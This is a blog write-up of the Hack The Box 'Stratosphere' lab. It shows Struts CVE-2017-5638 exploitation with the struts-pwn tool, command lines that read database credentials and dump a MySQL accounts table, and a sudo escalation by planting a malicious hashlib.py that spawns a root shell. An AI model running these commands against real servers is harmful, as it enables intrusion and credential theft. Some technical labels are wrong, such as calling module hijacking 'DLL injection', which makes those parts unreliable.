HTB Stratosphere Write-Up
皆さんこんにちは!
Introduction
The box was pretty fun with some rabbit holes which can really frustrate someone (personal experience) once the vulnerability has been exposed things do not go easy from there as the boxes itself has many protections in it. I am going to show you how I owned this box. So basically the “http” running Apache Tomcat was vulnerable to Apache struts vulnerability, leveraging that we get credential information of a user, ssh in and then do a DLL Injection Privilege Escalation to get root.
Initial Enumeration
The first enumeration is starting an nmap scan and brute forcing website directories. For this specific purpose I created a Automation tool called “AutoRecon” which I use here, but you can always do this manually.
nmap flags are : nmap -v -sV -sC 10.10.10.64 -oA nmap/scanResults
Nmap returned the following:
It shows 3 ports are open which are 22,80 and 8080, I did a full port scan but did not find anything different. Everything seems to be normal, nothing much to do here.
Visiting the website, we are greeted with this:
Pretty dandy if you ask me >_< !! Let’s start the directory brute forcing then!
gobuster flags are : gobuster dir -u http://10.10.10.64/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Hmm?? Omoshiroi!! This is starting to get interesting now! We get two directories but the status is 302 (which means “moved permanently”)
Without further ado lets search em’ up!
A search to http://10.10.10.64/manager returned the following:
It’s asking for credentials but we don’t have any, still I tried some basic combinations like “admin::admin”, “admin::password” and such but to no luck :( .
A search to http://10.10.10.64/Monitoring actually redirected me to http://10.10.10.64/Monitoring/example/Welcome.action and this is what greeted me.
Clicking on both the links showed this:
At this point I did some more directory brute forcing and used all the wordlists but I didn’t have a clue as to what to do now. I though that if http://10.10.10.64/manager requires a login and http://10.10.10.64/Monitoring/example/Welcome.action is a site under construction then why bother with the later website? Something is definitley fishy in the second url. My mistake was that I was searching for credentials to log in to the first one and lost a lot of time. Then I noticed something strange in the second website.
Apache Struts Vulnerability
I noticed that the urls of the second website were kind of strange, I’ve never seen them before.
Precisely! They were all ending with “.action” and after searching I found the gold-mine I was looking for.
From https://www.tutorialspoint.com/struts_2/struts_actions.htm , “Actions are the core of the Struts2 framework, as they are for any MVC (Model View Controller) framework. Each URL is mapped to a specific action, which provides the processing logic which is necessary to service the request from the user.
But the action also serves in two other important capacities. Firstly, the action plays an important role in the transfer of data from the request through to the view, whether its a JSP or other type of result. Secondly, the action must assist the framework in determining which result should render the view that will be returned in the response to the request.”
From Wikipedia:
“Struts 2 has a history of critical security bugs, many tied to its use of OGNL technology, some vulnerabilities can lead to arbitrary code execution. In October 2017, it was reported that failure by Equifax to address a Struts 2 vulnerability advised in March 2017 was later exploited in the data breach that was disclosed by Equifax in September 2017.”
Exploitation
So, if RCE is possible then we should be able to get a Reverse Shell and subsequently own the box, I found an exploit via searchsploit (https://www.exploit-db.com/exploits/41570) but there was a trouble. My first plan was to play around the RCE then use reverse shell commands to get me a shell via netcat but that required multiple line commands and this exploit only allowed single argument commands like “ls”, “whoami” and so on. I tried to change this but only ended up complicating things. No doubt this is what I wanted (all the single argument commands worked) but the exploit needs to be modified a bit. I searched “CVE 2017–5638 git-hub” and I got across this beautiful repo https://github.com/mazen160/struts-pwn. This exploit had exactly what I wanted I can run multiple commands at once (“I’m great at things like this *>_<).
After reading it’s documentation I ran it as:
It worked and we see the id of Tomcat showing up. Now, after all this, I am still after those credentials so that we can login to that site and I know any user on this box should be on the home folder, so here I go!
using multiple commands I fished out the user “richard” !!
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘cd ../../../home && ls -la’
But the trouble is, I don’t know “richard” ‘s password so I can’t ssh in as user in the box. Need more enumeration.
Looking at tomcat directory I found a directory called “db_connect”. A text file containing Database credentials.
Retrieving credentials from Database
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘cat db_connect’
Caution: First credentials are Rabbit Hole! I learned it the hard way T_T
I tried to login to mysql using the credentials given here using my own machine but it seems like Stratosphere was blocking connections. The only way is to use the RCE to access it. Again remember, we don’t have reverse shell so it should be a one-liner command. We know we are using database name: “users” so “SELECT * from <tableName> should work!
This was according to me the hardest part! After many hit and trials, and searching I finally got it to work. This article helped me very much https://medium.com/bugbountywriteup/alternatives-to-extract-tables-and-columns-from-mysql-and-mariadb-813171d3c8bc ! But how many tables are there? I ran the following to know.
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin -e “use users; show tables”’
Immediately it informed me that the table name is “accounts” ! UwU !
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin -e “use users; SELECT * from accounts”’
aaanddd… we got richard’s password!! Who would have know it was here!!! OwO
Lets SSH in !!!
Everything’s fine! user.txt is done! Now Priv Esc!
Privilege Escalation — DLL Injection
HTB has taught me many things, and one of them is abusing sudo to get an escalation. So that’s what I do! sudo -l
This sure returned interesting results! So richard can run two things without password, first is the test.py in its home directory and other, it can also use python version to do the same ( /usr/bin/python*). So it is now pretty obvious that if we somehow hijack test.py and force it run system commands, we are pretty much done with. And yes it was that easy!
Taking a look at test.py
It’s asking us to crack some hashes, after which it will run the “os.system(‘/root/success.py’)” command, it has cleverly shielded the import os module inside the “question” function, the last boss lives up-to its name!
Now obviously it does not wants us to win this little cracking game (yes, I tried). The first three hashes seems easy and hashcat will do its job perfectly but the last one is intentionally there to stop us. Here comes DLL Injection!!!
DLL Injection means instead of linking the libraries from the disc, if a same name python script is present in the same folder it links it. Here hashlib is the very good attack target for DLL Injection. Once the original hashlib.py from the /usr/lib/python2.7/hashlib.py is not linked anymore and it is linked with our own custom made hashlib.py in the home folder, the whole cracking game would crumble! Let’s do it!
Lets create our own hashlib.py which will be actually linked instead of the original one and execute the bash command! echo ‘import os; os.system(“/bin/bash”)’ > hashlib.py
Time for the final attack! STARBURST STREAM!
YESS!! WE ARE ROOT!! root.txt can be obviously obtained from the root directory!
Conclusion
In the end, I enjoyed this box I was so frustrated in the beginning and I ignored what’s in front of me for so long just goes to show how well these are made! There were many Rabbit Holes in this one! After finishing the box I tested DLL Injection on my home Kali Machine too and yes it was vulnerable but since I am the only user so that should not be a problem but it can be a problem in a multi-user environment. This was my first Blog post I hope you enjoyed it! I plan to post more security related stuff, write-ups, exploits, cves and the like, so please look forward to it. Any suggestion or improvements in my steps are greatly welcomed!
Stay Cool!
